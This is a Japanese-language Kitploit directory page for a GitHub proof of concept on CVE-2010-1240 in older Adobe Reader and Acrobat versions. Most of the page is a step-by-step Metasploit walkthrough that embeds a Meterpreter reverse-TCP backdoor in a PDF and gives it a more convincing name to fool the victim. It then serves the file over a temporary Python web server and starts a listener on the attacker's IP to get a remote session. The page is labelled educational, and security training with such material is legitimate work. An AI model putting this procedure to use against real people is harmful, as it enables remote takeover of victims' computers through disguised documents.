Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2010-1240 — CVE-2010-1240を悪用してPDFファイルにMeterpreterバックドアを埋め込む方法を示す教育用の概念実証であり、許可されたセキュリティテストのためのステップバイステップのMetasploit手順を含みます。 | Kitploit
ツール/GitHubGitHub/asepsaepdin/cve-2010-1240
フィッシングツールエクスプロイトフレームワークウェブアプリケーション悪用ペネトレーションテストソーシャルエンジニアリングペイロード開発
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

CVE-2010-1240を悪用してPDFファイルにMeterpreterバックドアを埋め込む方法を示す教育用の概念実証であり、許可されたセキュリティテストのためのステップバイステップのMetasploit手順を含みます。

リポジトリを見る
11533年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2010-1240 - PDFへのバックドア埋め込み

Python


⚠️ 教育目的および許可されたセキュリティ研究目的のみに使用してください

説明

WindowsおよびMac OS X上のAdobe ReaderおよびAcrobat 9.3.3より前の9.x、8.2.3より前の8.xは、Launch File警告ダイアログ内の1つのテキストフィールドの内容を制限しません。これにより、リモートの攻撃者は、PDFドキュメント内で指定された任意のローカルプログラムを実行するようユーザーを騙しやすくなります。これは、Openボタンをクリックすると暗号化されたメッセージを読むことができると主張するテキストフィールドによって実証されています。

デモ

アニメーション

手順

  1. まず、msfconsoleを実行します

    root@kitploit:~
    msfconsole
    
  2. 次に、PDFに埋め込むためのペイロードを設定します

    root@kitploit:~
    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. INFILENAMEオプションを設定し、元のPDFファイルへの直接パスを指定します

    root@kitploit:~
    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. FILENAMEオプションを設定して、新しく作成される悪意のあるPDFファイルの名前を、より説得力のある名前に変更します

    root@kitploit:~
    set FILENAME laporan.pdf
    
  5. ペイロードを見つけてPDFファイルに埋め込みます

    root@kitploit:~
    set payload windows/meterpreter/reverse_tcp
    
  6. LHOSTオプションを攻撃者のIPに設定します

    root@kitploit:~
    set LHOST 172.16.10.10
    
  7. 新しいターミナルを開き、悪意のあるPDFファイルの場所に移動します

    root@kitploit:~
    cd .msf4/local/
    
  8. Pythonで一時サーバーを作成します

    root@kitploit:~
    python -m http.server
    
  9. 被害者のマシンで悪意のあるPDFファイルをダウンロードします

    root@kitploit:~
    http://172.16.10.10:8000/certificate.pdf
    
  10. 被害者のマシンで悪意のあるPDFファイルを実行する前に、先ほどのターミナルでリスナーを起動します

    root@kitploit:~
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. 被害者のマシンで悪意のあるPDFファイルが実行されると、被害者のマシンへの接続が確立されます

クレジット

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
ツールをダウンロード